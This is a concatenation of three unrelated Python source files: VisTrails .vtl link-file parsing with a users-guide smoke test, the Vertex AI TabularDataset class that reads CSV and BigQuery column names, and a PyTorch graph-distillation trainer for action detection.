        data = node.get('execute')
        execute = convert_from_str(data, 'bool')
        data = node.get('showSpreadsheetOnly')
        showSpreadsheetOnly = convert_from_str(data, 'bool')
        data = node.get('url', None)
        url = convert_from_str(data,'str')
        data = node.get('vtcontent', None)
        vtcontent = convert_from_str(data,'base64')
        data = node.get('filename', None)
        vtname = convert_from_str(data, 'str')
        data = node.get('forceDB',None)
        forceDB = convert_from_str(data,'bool')
        data = node.get('mashuptrail', None)
        mashuptrail = convert_from_str(data, 'str')
        data = node.get('mashupVersion', None)
        mashupVersion = convert_from_str(data, 'int')
        data = node.get('parameterExploration', None)
        parameterExploration = convert_from_str(data, 'int')
        #if execute is False, we will show the builder too
        if showSpreadsheetOnly and not execute:
            showSpreadsheetOnly = False
        # Versions written as numbers become ints; tag names stay strings.
        try:
            version = int(version)
        except (ValueError, TypeError):
            pass
        if tag is None:
            tag = ''
        ## execute and showSpreadsheetOnly should be written to the current
        ## configuration
        config = get_vistrails_configuration()
        config.execute = execute
        config.showWindow = not showSpreadsheetOnly
        if not forceDB:
            # Embedded content takes priority: extract it next to the .vtl
            # file and open the extracted copy.
            if vtcontent is not None:
                if url is not None:
                    basename = url.split('/')[-1]
                    base,ext = os.path.splitext(basename)
                    dirname = os.path.dirname(filename)
                    fname = os.path.join(dirname,basename)
                else:
                    basename = os.path.basename(filename)
                    base,ext = os.path.splitext(basename)
                    ext = guess_extension_from_contents(vtcontent)
                    dirname = os.path.dirname(filename)
                    fname = os.path.join(dirname,"%s%s"%(base,ext))
                create_file = True
                if os.path.exists(fname): #file was extracted before
                    create_file = False
                    oldf = open(fname)
                    oldcontents = oldf.read()
                    if oldcontents != vtcontent:
                        # Content changed since last extraction: ask whether
                        # to overwrite or pick a fresh numbered name.
                        import vistrails.gui.extras.core.db.locator as db_gui
                        (overwrite, newname) = \
                            db_gui.ask_to_overwrite_file(None, 'vistrail')
                        create_file = True
                        if newname:
                            fname = newname
                        elif overwrite == False:
                            i=1
                            while os.path.exists(fname):
                                newbase = "%s_%s%s" % (base, i, ext)
                                fname = os.path.join(dirname,newbase)
                                i+=1
                if create_file:
                    f = open(fname,'wb')
                    f.write(vtcontent)
                    f.close()
                return FileLocator(fname, version_node=version, version_tag=tag,
                                   mashuptrail=mashuptrail,
                                   mashupVersion=mashupVersion,
                                   parameterExploration=parameterExploration)
        if host is not None:
            # No embedded content (or forceDB): open from the database.
            user = ""
            passwd = ""
            return DBLocator(host, port, database,
                             user, passwd, None, obj_id=vt_id,
                             obj_type='vistrail',connection_id=None,
                             version_node=version, version_tag=tag,
                             mashuptrail=mashuptrail,
                             mashupVersion=mashupVersion,
                             parameterExploration=parameterExploration)
        elif vtname is not None:
            if os.path.dirname(vtname) == '':
                #check if file exists in the same directory as the .vtl file
                dirname = os.path.dirname(filename)
                newvtname = os.path.join(dirname,vtname)
                if os.path.exists(newvtname):
                    vtname = newvtname
            #check for magic strings
            if "@examples" in vtname:
                vtname=vtname.replace("@examples", vistrails_examples_directory())
            return FileLocator(vtname, version_node=version, version_tag=tag,
                               mashuptrail=mashuptrail,
                               mashupVersion=mashupVersion,
                               parameterExploration=parameterExploration)
import unittest
# Test vtl files in usersguide
class TestUsersGuideVTL(unittest.TestCase):
    """Smoke-test every .vtl link file shipped with the users guide:
    execute the ones that pin a version, just load and validate the rest."""

    # Resolved at class-creation time; the skipIf decorator below evaluates
    # it immediately, so a missing checkout skips the whole test.
    vtl_path = os.path.join(vistrails_root_directory(), '..', 'doc',
                            'usersguide', 'vtl')

    @unittest.skipIf(not os.path.isdir(vtl_path), 'Could not find vtl dir')
    def test_vtl_files(self):
        from vistrails.tests.utils import run_file
        for root, dirs, file_names in os.walk(self.vtl_path):
            for file_name in sorted(file_names):
                if file_name.endswith('.vtl'):
                    # update available packages
                    from vistrails.core.packagemanager import get_package_manager
                    get_package_manager().build_available_package_names_list()
                    f = os.path.join(root, file_name)
                    # FileLocator is a factory; this yields a concrete
                    # locator for the file referenced by the .vtl.
                    locator = FileLocator(f)
                    version = locator._vnode
                    # if there is a version specified try to execute it,
                    # else just load the pipeline
                    if version:
                        errors = run_file(f, lambda x: x == version)
                        self.assertEqual(errors, [], 'Errors processing %s: %s' % (f, str(errors)))
                    else:
                        import vistrails.core.db.io
                        from vistrails.core.vistrail.controller import \
                            VistrailController
                        loaded_objs = vistrails.core.db.io.load_vistrail(locator)
                        controller = VistrailController(loaded_objs[0],
                                                        locator,
                                                        *loaded_objs[1:])
                        controller.change_selected_version(
                            controller.vistrail.get_latest_version())
                        self.assertTrue(controller.current_pipeline.is_valid,
                                        "Latest pipeline is invalid: %s" % f)
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import csv
import logging
from typing import Dict, List, Optional, Sequence, Set, Tuple, Union
from google.auth import credentials as auth_credentials
from google.cloud import bigquery
from google.cloud import storage
from google.cloud.aiplatform import datasets
from google.cloud.aiplatform.datasets import _datasources
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import schema
from google.cloud.aiplatform import utils
class TabularDataset(datasets._Dataset):
    """Managed tabular dataset resource for Vertex AI."""

    _supported_metadata_schema_uris: Optional[Tuple[str]] = (
        schema.dataset.metadata.tabular,
    )

    @property
    def column_names(self) -> List[str]:
        """Retrieve the columns for the dataset by extracting it from the Google Cloud Storage or
        Google BigQuery source.

        Returns:
            List[str]
                A list of columns names

        Raises:
            RuntimeError: When no valid source is found.
        """
        self._assert_gca_resource_is_available()
        metadata = self._gca_resource.metadata
        if metadata is None:
            raise RuntimeError("No metadata found for dataset")

        input_config = metadata.get("inputConfig")
        if input_config is None:
            raise RuntimeError("No inputConfig found for dataset")

        gcs_source = input_config.get("gcsSource")
        bq_source = input_config.get("bigquerySource")

        if gcs_source:
            gcs_source_uris = gcs_source.get("uri")
            if gcs_source_uris:
                # Lexicographically sort the files and read the header of
                # the first one only.
                gcs_source_uris.sort()
                # TODO(b/193044977): Return as Set instead of List
                return list(
                    self._retrieve_gcs_source_columns(
                        project=self.project,
                        gcs_csv_file_path=gcs_source_uris[0],
                        credentials=self.credentials,
                    )
                )
        elif bq_source:
            bq_table_uri = bq_source.get("uri")
            if bq_table_uri:
                # TODO(b/193044977): Return as Set instead of List
                return list(
                    self._retrieve_bq_source_columns(
                        project=self.project,
                        bq_table_uri=bq_table_uri,
                        credentials=self.credentials,
                    )
                )
        raise RuntimeError("No valid CSV or BigQuery datasource found.")

    @staticmethod
    def _retrieve_gcs_source_columns(
        project: str,
        gcs_csv_file_path: str,
        credentials: Optional[auth_credentials.Credentials] = None,
    ) -> Set[str]:
        """Retrieve the columns from a comma-delimited CSV file stored on Google Cloud Storage

        Example Usage:
            column_names = _retrieve_gcs_source_columns(
                "project_id",
                "gs://example-bucket/path/to/csv_file"
            )
            # column_names = {"column_1", "column_2"}

        Args:
            project (str):
                Required. Project to initiate the Google Cloud Storage client with.
            gcs_csv_file_path (str):
                Required. A full path to a CSV files stored on Google Cloud Storage.
                Must include "gs://" prefix.
            credentials (auth_credentials.Credentials):
                Credentials to use to with GCS Client.

        Returns:
            Set[str]
                A set of columns names in the CSV file.

        Raises:
            RuntimeError: When the retrieved CSV file is invalid.
        """
        gcs_bucket, gcs_blob = utils.extract_bucket_and_prefix_from_gcs_path(
            gcs_csv_file_path
        )
        client = storage.Client(project=project, credentials=credentials)
        bucket = client.bucket(gcs_bucket)
        blob = bucket.blob(gcs_blob)

        # Incrementally download the CSV file until the header is retrieved
        first_new_line_index = -1
        start_index = 0
        increment = 1000
        line = ""

        # Install the log filter *before* entering the try block: previously
        # `logger`/`logging_warning_filter` were bound inside the try, so an
        # early failure made the finally clause raise NameError, masking the
        # real error.
        logger = logging.getLogger("google.resumable_media._helpers")
        logging_warning_filter = utils.LoggingFilter(logging.INFO)
        logger.addFilter(logging_warning_filter)

        try:
            while first_new_line_index == -1:
                line += blob.download_as_bytes(
                    start=start_index, end=start_index + increment - 1
                ).decode("utf-8")
                first_new_line_index = line.find("\n")
                start_index += increment

            header_line = line[:first_new_line_index]

            # Split to make it an iterable
            header_line = header_line.split("\n")[:1]

            csv_reader = csv.reader(header_line, delimiter=",")
        except (ValueError, RuntimeError) as err:
            # Chain the original exception for easier debugging.
            raise RuntimeError(
                "There was a problem extracting the headers from the CSV file at '{}': {}".format(
                    gcs_csv_file_path, err
                )
            ) from err
        finally:
            logger.removeFilter(logging_warning_filter)

        return set(next(csv_reader))

    @staticmethod
    def _get_bq_schema_field_names_recursively(
        schema_field: bigquery.SchemaField,
    ) -> Set[str]:
        """Retrieve the name for a schema field along with ancestor fields.

        Nested schema fields are flattened and concatenated with a ".".
        Schema fields with child fields are not included, but the children are.

        Args:
            schema_field (bigquery.SchemaField):
                Required. The schema field (possibly nested) to flatten.

        Returns:
            Set[str]
                The names of this field's "leaf" columns, prefixed with the
                names of their ancestors, e.g. {"parent.child"}.
        """
        ancestor_names = {
            nested_field_name
            for field in schema_field.fields
            for nested_field_name in TabularDataset._get_bq_schema_field_names_recursively(
                field
            )
        }

        # Only return "leaf nodes", basically any field that doesn't have children
        if len(ancestor_names) == 0:
            return {schema_field.name}
        else:
            return {f"{schema_field.name}.{name}" for name in ancestor_names}

    @staticmethod
    def _retrieve_bq_source_columns(
        project: str,
        bq_table_uri: str,
        credentials: Optional[auth_credentials.Credentials] = None,
    ) -> Set[str]:
        """Retrieve the column names from a table on Google BigQuery

        Nested schema fields are flattened and concatenated with a ".".
        Schema fields with child fields are not included, but the children are.

        Example Usage:
            column_names = _retrieve_bq_source_columns(
                "project_id",
                "bq://project_id.dataset.table"
            )
            # column_names = {"column_1", "column_2", "column_3.nested_field"}

        Args:
            project (str):
                Required. Project to initiate the BigQuery client with.
            bq_table_uri (str):
                Required. A URI to a BigQuery table.
                Can include "bq://" prefix but not required.
            credentials (auth_credentials.Credentials):
                Credentials to use with BQ Client.

        Returns:
            Set[str]
                A set of column names in the BigQuery table.
        """
        # Remove bq:// prefix
        prefix = "bq://"
        if bq_table_uri.startswith(prefix):
            bq_table_uri = bq_table_uri[len(prefix) :]

        client = bigquery.Client(project=project, credentials=credentials)
        table = client.get_table(bq_table_uri)
        schema = table.schema
        return {
            field_name
            for field in schema
            for field_name in TabularDataset._get_bq_schema_field_names_recursively(
                field
            )
        }

    @classmethod
    def create(
        cls,
        display_name: str,
        gcs_source: Optional[Union[str, Sequence[str]]] = None,
        bq_source: Optional[str] = None,
        project: Optional[str] = None,
        location: Optional[str] = None,
        credentials: Optional[auth_credentials.Credentials] = None,
        request_metadata: Optional[Sequence[Tuple[str, str]]] = (),
        labels: Optional[Dict[str, str]] = None,
        encryption_spec_key_name: Optional[str] = None,
        sync: bool = True,
    ) -> "TabularDataset":
        """Creates a new tabular dataset.

        Args:
            display_name (str):
                Required. The user-defined name of the Dataset.
                The name can be up to 128 characters long and can be consist
                of any UTF-8 characters.
            gcs_source (Union[str, Sequence[str]]):
                Google Cloud Storage URI(-s) to the
                input file(s). May contain wildcards. For more
                information on wildcards, see
                https://cloud.google.com/storage/docs/gsutil/addlhelp/WildcardNames.
                examples:
                    str: "gs://bucket/file.csv"
                    Sequence[str]: ["gs://bucket/file1.csv", "gs://bucket/file2.csv"]
            bq_source (str):
                BigQuery URI to the input table.
                example:
                    "bq://project.dataset.table_name"
            project (str):
                Project to upload this model to. Overrides project set in
                aiplatform.init.
            location (str):
                Location to upload this model to. Overrides location set in
                aiplatform.init.
            credentials (auth_credentials.Credentials):
                Custom credentials to use to upload this model. Overrides
                credentials set in aiplatform.init.
            request_metadata (Sequence[Tuple[str, str]]):
                Strings which should be sent along with the request as metadata.
            labels (Dict[str, str]):
                Optional. Labels with user-defined metadata to organize your Tensorboards.
                Label keys and values can be no longer than 64 characters
                (Unicode codepoints), can only contain lowercase letters, numeric
                characters, underscores and dashes. International characters are allowed.
                No more than 64 user labels can be associated with one Tensorboard
                (System labels are excluded).
                See https://goo.gl/xmQnxf for more information and examples of labels.
                System reserved label keys are prefixed with "aiplatform.googleapis.com/"
                and are immutable.
            encryption_spec_key_name (Optional[str]):
                Optional. The Cloud KMS resource identifier of the customer
                managed encryption key used to protect the dataset. Has the
                form:
                ``projects/my-project/locations/my-region/keyRings/my-kr/cryptoKeys/my-key``.
                The key needs to be in the same region as where the compute
                resource is created.

                If set, this Dataset and all sub-resources of this Dataset will be secured by this key.

                Overrides encryption_spec_key_name set in aiplatform.init.
            sync (bool):
                Whether to execute this method synchronously. If False, this method
                will be executed in concurrent Future and any downstream object will
                be immediately returned and synced when the Future has completed.

        Returns:
            tabular_dataset (TabularDataset):
                Instantiated representation of the managed tabular dataset resource.
        """
        utils.validate_display_name(display_name)
        if labels:
            utils.validate_labels(labels)

        api_client = cls._instantiate_client(location=location, credentials=credentials)

        metadata_schema_uri = schema.dataset.metadata.tabular

        datasource = _datasources.create_datasource(
            metadata_schema_uri=metadata_schema_uri,
            gcs_source=gcs_source,
            bq_source=bq_source,
        )

        return cls._create_and_import(
            api_client=api_client,
            parent=initializer.global_config.common_location_path(
                project=project, location=location
            ),
            display_name=display_name,
            metadata_schema_uri=metadata_schema_uri,
            datasource=datasource,
            project=project or initializer.global_config.project,
            location=location or initializer.global_config.location,
            credentials=credentials or initializer.global_config.credentials,
            request_metadata=request_metadata,
            labels=labels,
            encryption_spec=initializer.global_config.get_encryption_spec(
                encryption_spec_key_name=encryption_spec_key_name
            ),
            sync=sync,
        )

    def import_data(self):
        # Tabular datasets are created directly from their source; there is
        # no separate import step.
        raise NotImplementedError(
            f"{self.__class__.__name__} class does not support 'import_data'"
        )
| |
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model to train detection."""
from collections import OrderedDict
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import utils
from nets.get_tad import *
from nets.get_distillation_kernel import *
CNN_MODALITIES = ['rgb', 'oflow', 'depth']
GRU_MODALITIES = ['jjd', 'jjv', 'jld']
class BaseModel:
  """Base trainer for temporal action detection over multiple modalities.

  Builds one ``get_tad`` network per modality, each wrapped in
  ``nn.DataParallel`` and moved to GPU. Visual modalities (rgb/oflow/depth)
  get a 'cnn' encoder type, the others an 'rnn' encoder type. Only the
  modality at index ``to_idx`` has optimizers attached and is the one
  saved by :meth:`save`.
  """

  def __init__(self, modalities, n_classes, n_frames, n_channels, input_sizes,
               hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
               dropout_seq, bg_w, lr, lr_decay_rate, to_idx, ckpt_path):
    super(BaseModel, self).__init__()
    cudnn.benchmark = True
    utils.info('{} modality'.format(modalities[to_idx]))
    # One embedding network per modality, each data-parallel on GPU.
    self.embeds = []
    for i, m in enumerate(modalities):
      # CNN encoder for image-like modalities, RNN encoder otherwise.
      encoder_type = 'cnn' if m in CNN_MODALITIES else 'rnn'
      embed = nn.DataParallel(
          get_tad(n_classes, n_frames, n_channels[i], input_sizes[i],
                  hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
                  dropout_seq, encoder_type).cuda())
      self.embeds.append(embed)
    # Multiple optimizers: only the trained modality (to_idx) is optimized.
    self.optimizers = []
    self.lr_decay_rates = []
    # Visual encoder: SGD
    visual_params = list(self.embeds[to_idx].module.embed.parameters())
    visual_optimizer = optim.SGD(
        visual_params, lr=lr, momentum=0.9, weight_decay=5e-4)
    self.optimizers.append(visual_optimizer)
    self.lr_decay_rates.append(lr_decay_rate)
    # Sequence encoder: Adam (rnn + final fc of the same network)
    sequence_params = list(self.embeds[to_idx].module.rnn.parameters()) + \
        list(self.embeds[to_idx].module.fc.parameters())
    sequence_optimizer = optim.Adam(sequence_params, lr=1e-3)
    self.optimizers.append(sequence_optimizer)
    self.lr_decay_rates.append(1)  # No learning rate decay for Adam
    # Weighted cross-entropy loss: class 0 (background) weighted by bg_w,
    # the n_classes action classes weighted 1.
    self.criterion_cls = nn.CrossEntropyLoss(
        torch.FloatTensor([bg_w] + [1] * n_classes)).cuda()

    self.n_classes = n_classes
    self.modalities = modalities
    self.to_idx = to_idx
    self.ckpt_path = ckpt_path

  def _forward(self, inputs):
    """Forward pass for all modalities.

    :param inputs: list with one batch tensor per modality.
    :return: [logits, reprs], each stacked with a leading modality axis.
    """
    logits, reprs = [], []
    for i in range(len(inputs)):
      logit, repr = self.embeds[i](inputs[i])
      logits.append(logit)
      reprs.append(repr)
    logits = torch.stack(logits)
    reprs = torch.stack(reprs)
    return [logits, reprs]

  def _backward(self, results, label):
    # Subclasses implement the loss computation and optimizer step.
    raise NotImplementedError

  def train(self, inputs, label):
    """Train model.

    :param inputs: a list, each is batch_size x timestep x n_frames x (n_channels x h x w) or (input_size)
    :param label: batch_size x timestep
    :return: OrderedDict of loss and accuracy statistics for logging.
    """
    for embed in self.embeds:
      embed.train()
    for i in range(len(inputs)):
      inputs[i] = Variable(inputs[i].cuda(), requires_grad=False)
    label = Variable(label.cuda(), requires_grad=False)

    results = self._forward(inputs)
    info_loss = self._backward(results, label)
    info_acc = self._get_acc(results[0], label)
    return OrderedDict(info_loss + info_acc)

  def test(self, inputs, label, timestep):
    '''Test model.

    Splits the (single-modality) input video into overlapping segments of
    length ``timestep``, runs the forward pass, then averages the logits
    of all segments covering each frame.

    param timestep: split into segments of length timestep.
    '''
    for embed in self.embeds:
      embed.eval()
    input = Variable(inputs[0].cuda(), requires_grad=False)
    label = Variable(label.cuda(), requires_grad=False)
    length = input.size(1)
    # Split video into segments
    input, start_indices = utils.get_segments(input, timestep)
    inputs = [input]
    logits, _ = self._forward(inputs)
    logits = utils.to_numpy(logits).squeeze(0)
    # all_logits[t] collects every segment prediction that covers frame t.
    all_logits = [[] for i in range(length)]
    for i in range(len(start_indices)):
      s = start_indices[i]
      for j in range(timestep):
        all_logits[s + j].append(logits[i][j])
    # Average logits for each time step.
    final_logits = np.zeros((length, self.n_classes + 1))
    for i in range(length):
      final_logits[i] = np.mean(all_logits[i], axis=0)
    logits = final_logits
    info_acc = self._get_acc([torch.Tensor(logits)], label)
    scores = utils.softmax(logits, axis=1)
    return OrderedDict(info_acc), logits, scores

  def _get_acc(self, logits, label):
    """Get detection statistics for modality.

    Returns a list of (name, value) pairs: per-modality average precision,
    overall accuracy, background accuracy and action accuracy.
    """
    info_acc = []
    for i, m in enumerate(self.modalities):
      logit = logits[i].view(-1, self.n_classes + 1)
      label = label.view(-1)
      stats = utils.get_stats_detection(logit, label, self.n_classes + 1)
      info_acc.append(('ap_{}'.format(m), stats[0]))
      info_acc.append(('acc_{}'.format(m), stats[1]))
      info_acc.append(('acc_bg_{}'.format(m), stats[2]))
      info_acc.append(('acc_action_{}'.format(m), stats[3]))
    return info_acc

  def save(self, epoch):
    # Only the trained modality's network is checkpointed.
    path = os.path.join(self.ckpt_path, 'embed_{}.pth'.format(epoch))
    torch.save(self.embeds[self.to_idx].state_dict(), path)

  def load(self, load_ckpt_paths, options, epoch=200):
    """Load checkpoints.

    :param load_ckpt_paths: one path per modality; '' means train from scratch.
    :param options: per-modality load mode: 0 = full model (visual +
        sequence), 1 = pretrained visual encoder only.
    :param epoch: checkpoint epoch suffix used with load mode 0.
    """
    assert len(load_ckpt_paths) == len(self.embeds)
    for i in range(len(self.embeds)):
      ckpt_path = load_ckpt_paths[i]
      load_opt = options[i]
      if len(ckpt_path) == 0:
        utils.info('{}: training from scratch'.format(self.modalities[i]))
        continue

      if load_opt == 0:  # load teacher model (visual + sequence)
        path = os.path.join(ckpt_path, 'embed_{}.pth'.format(epoch))
        ckpt = torch.load(path)
        try:
          self.embeds[i].load_state_dict(ckpt)
        except:
          # NOTE(review): bare except hides the real error (size mismatch,
          # missing keys, ...) behind a generic hint — consider re-raising.
          utils.warn('Check that the "modalities" argument is correct.')
          exit(0)
        utils.info('{}: ckpt {} loaded'.format(self.modalities[i], path))
      elif load_opt == 1:  # load pretrained visual encoder
        ckpt = torch.load(ckpt_path)
        # Change keys in the ckpt
        new_state_dict = OrderedDict()
        for key in list(ckpt.keys())[:-2]:  # exclude fc weights
          new_key = key[7:]  # Remove 'module.'
          new_state_dict[new_key] = ckpt[key]
        # update state_dict
        state_dict = self.embeds[i].module.embed.state_dict()
        state_dict.update(new_state_dict)
        self.embeds[i].module.embed.load_state_dict(state_dict)
        utils.info('{}: visual encoder from {} loaded'.format(
            self.modalities[i], ckpt_path))
      else:
        raise NotImplementedError

  def lr_decay(self):
    """Multiply each optimizer's learning rate by its decay rate.

    :return: list of the updated learning rates (one per param group).
    """
    lrs = []
    for optimizer, decay_rate in zip(self.optimizers, self.lr_decay_rates):
      for param_group in optimizer.param_groups:
        param_group['lr'] *= decay_rate
        lrs.append(param_group['lr'])
    return lrs
class SingleStream(BaseModel):
  """Trainer for exactly one modality (no distillation).

  Thin specialization of BaseModel: verifies a single encoder was built
  and implements the plain cross-entropy backward pass for it.
  """

  def __init__(self, *args, **kwargs):
    super(SingleStream, self).__init__(*args, **kwargs)
    # BaseModel builds one encoder per modality; a single stream must
    # have been constructed with exactly one modality.
    assert len(self.embeds) == 1

  def _backward(self, results, label):
    """Compute the classification loss and apply one optimizer step.

    :param results: [logits, reprs] as produced by _forward.
    :param label: ground-truth labels, flattened to match the logits.
    :return: list of (name, value) pairs for logging.
    """
    all_logits = results[0]
    flat_logits = all_logits.view(-1, all_logits.size(-1))
    loss = self.criterion_cls(flat_logits, label.view(-1))
    loss.backward()
    # Clip gradients of the trained encoder before stepping.
    torch.nn.utils.clip_grad_norm(self.embeds[self.to_idx].parameters(), 5)
    for opt in self.optimizers:
      opt.step()
      opt.zero_grad()
    return [('loss', loss.data[0])]
class GraphDistillation(BaseModel):
  """Model to train with graph distillation.

  xfer_to is the modality to train; all other modalities act as sources
  whose logits/representations are distilled into it through a learned
  graph (the distillation kernel).
  """

  def __init__(self, modalities, n_classes, n_frames, n_channels, input_sizes,
               hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
               dropout_seq, bg_w, lr, lr_decay_rate, to_idx, ckpt_path,
               w_losses, w_modalities, metric, xfer_to, gd_size, gd_reg):
    super(GraphDistillation, self).__init__(\
        modalities, n_classes, n_frames, n_channels, input_sizes,
        hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq, dropout_seq,
        bg_w, lr, lr_decay_rate, to_idx, ckpt_path)
    # Index of the modality to distill; note this rebinds to_idx (the
    # constructor argument) based on xfer_to after the super() call.
    to_idx = self.modalities.index(xfer_to)
    from_idx = [x for x in range(len(self.modalities)) if x != to_idx]
    assert len(from_idx) >= 1
    # Prior over source modalities, softmaxed with temperature 0.25.
    w_modalities = [w_modalities[i] for i in from_idx
                   ]  # remove modality being transferred to
    gd_prior = utils.softmax(w_modalities, 0.25)
    # Distillation model
    self.distillation_kernel = \
        get_distillation_kernel(n_classes + 1, hidden_size, gd_size, to_idx, from_idx,
                                gd_prior, gd_reg, w_losses, metric).cuda()
    # Add optimizer to self.optimizers (same SGD settings as the visual encoder)
    gd_optimizer = optim.SGD(
        self.distillation_kernel.parameters(),
        lr=lr,
        momentum=0.9,
        weight_decay=5e-4)
    self.optimizers.append(gd_optimizer)
    self.lr_decay_rates.append(lr_decay_rate)

    self.xfer_to = xfer_to
    self.to_idx = to_idx
    self.from_idx = from_idx

  def _forward(self, inputs):
    """Forward all modalities, then compute the distillation graph.

    :return: (logits, reprs, graph) with logits/reprs flattened to
        (n_modalities, batch_size * length, -1).
    """
    logits, reprs = super(GraphDistillation, self)._forward(inputs)
    n_modalities, batch_size, length, _ = logits.size()
    logits = logits.view(n_modalities, batch_size * length, -1)
    reprs = reprs.view(n_modalities, batch_size * length, -1)
    # Get edge weights of the graph
    graph = self.distillation_kernel(logits, reprs)
    return logits, reprs, graph

  def _backward(self, results, label):
    """Classification + graph-distillation losses, then one optimizer step.

    :param results: (logits, reprs, graph); graph: size (len(from_idx) x batch_size)
    :param label: ground-truth labels, flattened to match the logits.
    :return: list of (name, value) loss pairs for logging.
    """
    logits, reprs, graph = results  # graph: size (len(from_idx) x batch_size)
    label = label.view(-1)
    info_loss = []
    # Classification loss (only on the modality being trained)
    loss_cls = self.criterion_cls(logits[self.to_idx], label)
    # Graph distillation loss
    loss_reg, loss_logit, loss_repr = \
        self.distillation_kernel.distillation_loss(logits, reprs, graph)

    loss = loss_cls + loss_reg + loss_logit + loss_repr
    loss.backward()
    torch.nn.utils.clip_grad_norm(self.embeds[self.to_idx].parameters(), 5)
    for optimizer in self.optimizers:
      optimizer.step()
      optimizer.zero_grad()

    info_loss = [('loss_cls', loss_cls.data[0]), ('loss_reg', loss_reg.data[0]),
                 ('loss_logit', loss_logit.data[0]), ('loss_repr',
                                                      loss_repr.data[0])]
    return info_loss
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.